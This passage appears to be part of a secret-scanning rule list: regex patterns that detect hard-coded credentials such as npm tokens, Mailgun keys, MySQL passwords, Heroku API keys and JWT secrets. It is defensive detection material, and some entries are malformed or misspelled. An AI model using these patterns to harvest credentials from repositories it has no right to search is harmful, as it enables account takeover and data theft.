"(?i)[\"']?rtd[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?route53[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ropsten[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rinkeby[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rest[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?repotoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?reporting[_-]?webdav[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?reporting[_-]?webdav[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?release[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?release[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?registry[_-]?secure[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?registry[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?refresh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rediscloud[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?redis[_-]?stunnel[_-]?urls[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?randrmusicapiaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?rabbitmq[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?quip[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?qiita[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pypi[_-]?passowrd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pushover[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?publish[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?publish[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?publish[_-]?access[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?project[_-]?config[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prod[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prod[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prod[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?private[_-]?signing[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pring[_-]?mail[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?preferred[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?prebuild[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgresql[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgresql[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?postgres[_-]?env[_-]?postgres[_-]?db[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?plugin[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?plotly[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?places[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?places[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pg[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pg[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?personal[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?personal[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?percy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?percy[_-]?project[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?paypal[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?passwordtravis[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?parse[_-]?js[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?pagerduty[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?packagecloud[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ossrh[_-]?jira[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?os[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?os[_-]?auth[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?openwhisk[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?open[_-]?whisk[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?onesignal[_-]?user[_-]?auth[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?onesignal[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?skey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?pubkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?pkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?omise[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?okta[_-]?oauth2[_-]?clientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?okta[_-]?oauth2[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?okta[_-]?client[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ofta[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ofta[_-]?region[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ofta[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?octest[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?octest[_-]?app[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?octest[_-]?app[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?oc[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?store[_-]?creds[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?store[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?storage[_-]?region[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?object[_-]?storage[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?numbers[_-]?service[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nuget[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nuget[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nuget[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?npm[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?now[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?non[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?accesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?node[_-]?env[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ngrok[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ngrok[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nexuspassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nexus[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?new[_-]?relic[_-]?beta[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?netlify[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?nativeevents[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysqlsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysqlmasteruser[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?root[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?hostname[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mysql[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?my[_-]?secret[_-]?env[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?workspace[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?workflow[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?disconnect[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?connect[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?multi[_-]?bob[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?minio[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?minio[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mile[_-]?zero[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mh[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mh[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mg[_-]?public[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mg[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapboxaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mapbox[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manifest[_-]?app[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manifest[_-]?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mandrill[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?managementapiaccesstoken[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?management[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manage[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?manage[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?secret[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?pub[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?pub[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?priv[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailgun[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailer[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailchimp[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mailchimp[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?mail[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?magento[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?magento[_-]?auth[_-]?username [\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?magento[_-]?auth[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?happo[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lottie[_-]?happo[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?looker[_-]?test[_-]?runner[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ll[_-]?shared[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ll[_-]?publish[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?linux[_-]?signing[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lighthouse[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lektor[_-]?deploy[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?lektor[_-]?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?leanplum[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kxoltsn3vogdop92m[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kubeconfig[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kubecfg[_-]?s3[_-]?path[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kovan[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?keystore[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kafka[_-]?rest[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kafka[_-]?instance[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?kafka[_-]?admin[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?jwt[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?jdbc:mysql[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?jdbc[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?jdbc[_-]?databaseurl[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?itest[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ios[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?internal[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?integration[_-]?test[_-]?appid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?integration[_-]?test[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?index[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ij[_-]?repo[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ij[_-]?repo[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hub[_-]?dxia2[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?homebrew[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hockeyapp[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?heroku[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?heroku[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?heroku[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hb[_-]?codesign[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hb[_-]?codesign[_-]?gpg[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hab[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hab[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?grgit[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gren[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gradle[_-]?signing[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gradle[_-]?signing[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - 